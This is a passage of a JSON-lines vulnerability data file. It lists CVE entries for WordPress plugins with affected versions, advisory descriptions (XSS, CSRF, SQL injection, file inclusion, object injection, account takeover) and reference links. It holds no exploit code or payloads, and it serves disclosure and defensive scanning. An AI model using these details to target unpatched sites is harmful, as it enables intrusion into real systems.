link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ced1c79-97fe-4841-9a02-ffb9f336212a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ced1c79-97fe-4841-9a02-ffb9f336212a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customize-my-account-for-woocommerce\\\/tags\\\/2.7.19\\\/phppoet-checkout-fields\\\/include\\\/admin\\\/pcfme_admin_settings.php#L840\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customize-my-account-for-woocommerce\\\/tags\\\/2.7.19\\\/phppoet-checkout-fields\\\/include\\\/admin\\\/pcfme_admin_settings.php#L840\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/customize-my-account-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/customize-my-account-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183607\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183607\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11442","slug":"horizontal-scroll-image-slideshow","versionImpact":"10.1","description":"The Horizontal scroll image slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'horizontal-scroll-image-slideshow' shortcode in all versions up to, and including, 10.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scroll-image-slideshow\\\/trunk\\\/horizontal-scroll-image-slideshow.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scroll-image-slideshow\\\/trunk\\\/horizontal-scroll-image-slideshow.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/horizontal-scroll-image-slideshow\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/horizontal-scroll-image-slideshow\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/050d0352-c0a5-41b0-bf40-914f6bf7cba4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/050d0352-c0a5-41b0-bf40-914f6bf7cba4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0311","slug":"themeisle-companion","versionImpact":"2.10.43","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table widget in all versions up to, and including, 2.10.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/47a17c86934cebbfc3f1a812f1afcaa20515c1f7\",\"name\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/47a17c86934cebbfc3f1a812f1afcaa20515c1f7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/c311050b372cf38e82d8ec9deadf4f21a8931487\",\"name\":\"https:\\\/\\\/github.com\\\/Codeinwp\\\/themeisle-companion\\\/commit\\\/c311050b372cf38e82d8ec9deadf4f21a8931487\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1024\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/trunk\\\/obfx_modules\\\/elementor-extra-widgets\\\/widgets\\\/elementor\\\/pricing-table.php#L1024\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219568\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3219568\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themeisle-companion\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d17a3a0-3c09-4d67-96d6-d97bde92f100?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d17a3a0-3c09-4d67-96d6-d97bde92f100?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13512","slug":"wonder-fontawesome","versionImpact":"0.8","description":"The Wonder FontAwesome plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wonder-fontawesome\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wonder-fontawesome\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494f5c9f-ef5b-48d8-8f3a-27e5ed4bea5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494f5c9f-ef5b-48d8-8f3a-27e5ed4bea5e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13677","slug":"get-bookings-wp","versionImpact":"1.1.27","description":"The GetBookingsWP \u2013 Appointments Booking Calendar Plugin For WordPress plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.1.27. This is due to the plugin not properly validating a user's identity prior to updating their details like email. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-bookings-wp\\\/trunk\\\/classes\\\/user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/get-bookings-wp\\\/trunk\\\/classes\\\/user.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6b0dc03-3715-41f8-8888-1cccddb39c0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6b0dc03-3715-41f8-8888-1cccddb39c0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1405","slug":"post-type-x","versionImpact":"1.7.11","description":"The Product Catalog Simple plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's show_products shortcode in all versions up to, and including, 1.7.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246414\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246414\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-type-x\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-type-x\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2ddd9a2-79d7-4f9c-9832-25c3363d3ce9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2ddd9a2-79d7-4f9c-9832-25c3363d3ce9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13909","slug":"accredible-certificates","versionImpact":"1.4.9","description":"The Accredible Certificates & Open Badges plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accredible-certificates\\\/tags\\\/1.4.9\\\/users_list.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accredible-certificates\\\/tags\\\/1.4.9\\\/users_list.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accredible-certificates\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accredible-certificates\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f96d3773-29a1-44bd-904a-905aff2b345e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f96d3773-29a1-44bd-904a-905aff2b345e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2158","slug":"wp-review","versionImpact":"5.3.5","description":"The WordPress Review Plugin: The Ultimate Solution for Building a Review Website plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.3.5 via the Post custom fields. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP file types can be uploaded and included, or pearcmd is enabled on a server with register_argc_argv also enabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-review\\\/tags\\\/5.3.5\\\/includes\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-review\\\/tags\\\/5.3.5\\\/includes\\\/functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-review\\\/tags\\\/5.3.5\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-review\\\/tags\\\/5.3.5\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a058e6bf-109f-4985-8aad-08858553c4c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a058e6bf-109f-4985-8aad-08858553c4c3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47581","slug":"wpeventplus","versionImpact":"2.6.0","description":"Deserialization of Untrusted Data vulnerability in Elbisnero WordPress Events Calendar Registration & Tickets allows Object Injection.This issue affects WordPress Events Calendar Registration & Tickets: from n\/a through 2.6.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpeventplus\\\/vulnerability\\\/wordpress-wordpress-events-calendar-registration-tickets-plugin-2-6-0-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpeventplus\\\/vulnerability\\\/wordpress-wordpress-events-calendar-registration-tickets-plugin-2-6-0-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5929","slug":"the-countdown","versionImpact":"2.0.1","description":"The The Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018clientId\u2019 parameter in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-countdown\\\/tags\\\/2.0.1\\\/the-countdown.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-countdown\\\/tags\\\/2.0.1\\\/the-countdown.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-countdown\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-countdown\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34578df8-661c-4c54-b06c-e1d787ca3c55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34578df8-661c-4c54-b06c-e1d787ca3c55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6174","slug":"qwiz-online-quizzes-and-flashcards","versionImpact":"3.9.4","description":"The Qwizcards | online quizzes and flashcards WordPress plugin through 3.9.4 does not sanitise and escape the \"_stylesheet\" parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or any other user.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0148","slug":"gallery-factory-lite","versionImpact":"2.0.0","description":"The Gallery Factory Lite WordPress plugin through 2.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f15f2f2c-2053-4b93-8064-15b5243a4021\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f15f2f2c-2053-4b93-8064-15b5243a4021\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0644","slug":"push-notification-for-wp-by-pushassist","versionImpact":"3.0.8","description":"The Push Notifications for WordPress by PushAssist WordPress plugin through 3.0.8 does not sanitise and escape various parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08f5089c-36f3-4d12-bca5-99cd3ae78f67\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/08f5089c-36f3-4d12-bca5-99cd3ae78f67\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2189","slug":"stax-addons-for-elementor","versionImpact":"1.4.3","description":"The Elementor Addons, Widgets and Enhancements \u2013 Stax plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the toggle_widget function in versions up to, and including, 1.4.3. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to enable or disable Elementor widgets.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stax-addons-for-elementor\\\/trunk\\\/core\\\/admin\\\/pages\\\/Widgets.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stax-addons-for-elementor\\\/trunk\\\/core\\\/admin\\\/pages\\\/Widgets.php#L31\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926550bb-265d-4811-a375-10c47e9fb4d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/926550bb-265d-4811-a375-10c47e9fb4d6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3369","slug":"about-me-3000","versionImpact":"2.2.6","description":"The About Me 3000 widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/about-me-3000\\\/trunk\\\/aboutme3000.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/about-me-3000\\\/trunk\\\/aboutme3000.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be6f660f-041a-42f2-ab5b-72aedf75727d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be6f660f-041a-42f2-ab5b-72aedf75727d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1392","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button1_icon' attribute of the Dual Button widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33d7dc4d-bb41-456a-bd1a-37d8f2aada30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33d7dc4d-bb41-456a-bd1a-37d8f2aada30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L885\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L885\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L885\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/dual-button\\\/widgets\\\/dual-button.php#L885\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5141","slug":"rotatingtweets","versionImpact":"1.9.10","description":"The Rotating Tweets (Twitter widget and shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's' 'rotatingtweets' in all versions up to, and including, 1.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02cff893-4f41-4bb0-9fb0-344a3a8afa0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02cff893-4f41-4bb0-9fb0-344a3a8afa0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rotatingtweets\\\/tags\\\/1.9.10\\\/rotatingtweets.php#L2267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rotatingtweets\\\/tags\\\/1.9.10\\\/rotatingtweets.php#L2267\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6720","slug":"light-poll","versionImpact":"1.0.0","description":"The Light Poll WordPress plugin through 1.0.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1449be1-ae85-46f4-b5ba-390d25b87723\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1449be1-ae85-46f4-b5ba-390d25b87723\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8324","slug":"xo-liteslider","versionImpact":"3.8.6","description":"The XO Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018get_slider\u2019 function in all versions up to, and including, 3.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be51c54d-b0f7-42b2-b9b3-1b5832e10a6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be51c54d-b0f7-42b2-b9b3-1b5832e10a6b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xo-liteslider\\\/tags\\\/3.8.6\\\/inc\\\/class-xo-slider.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xo-liteslider\\\/tags\\\/3.8.6\\\/inc\\\/class-xo-slider.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xo-liteslider\\\/tags\\\/3.8.6\\\/inc\\\/class-xo-slider.php#L315\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xo-liteslider\\\/tags\\\/3.8.6\\\/inc\\\/class-xo-slider.php#L315\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51708","slug":"narnoo-commerce-manager","versionImpact":"1.6.0","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Narnoo Wordpress developer Narnoo Commerce Manager allows Reflected XSS.This issue affects Narnoo Commerce Manager: from n\/a through 1.6.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/narnoo-commerce-manager\\\/wordpress-narnoo-commerce-manager-plugin-1-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/narnoo-commerce-manager\\\/wordpress-narnoo-commerce-manager-plugin-1-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10116","slug":"twitter-follow","versionImpact":"0.2","description":"The Twitter Follow Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'username' parameter in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twitter-follow\\\/trunk\\\/twitter-follow.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twitter-follow\\\/trunk\\\/twitter-follow.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3194573%40twitter-follow%2Ftrunk&old=1852833%40twitter-follow%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3194573%40twitter-follow%2Ftrunk&old=1852833%40twitter-follow%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/twitter-follow\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/twitter-follow\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac89439-bd0a-4772-858d-d11dd0de54b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fac89439-bd0a-4772-858d-d11dd0de54b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11433","slug":"surbma-salesautopilot-shortcode","versionImpact":"2.0","description":"The Surbma | SalesAutopilot Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sa-form' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/surbma-salesautopilot-shortcode\\\/trunk\\\/surbma-salesautopilot-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/surbma-salesautopilot-shortcode\\\/trunk\\\/surbma-salesautopilot-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/surbma-salesautopilot-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/surbma-salesautopilot-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/626c82a1-4157-4294-9563-08accccf2a10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/626c82a1-4157-4294-9563-08accccf2a10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13460","slug":"we-testimonial-slider","versionImpact":"1.5","description":"The WE \u2013 Testimonial Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Testimonial Author Names in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/we-testimonial-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/we-testimonial-slider\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/704a7df0-8e6b-4145-96a2-d179a6d75aac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/704a7df0-8e6b-4145-96a2-d179a6d75aac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
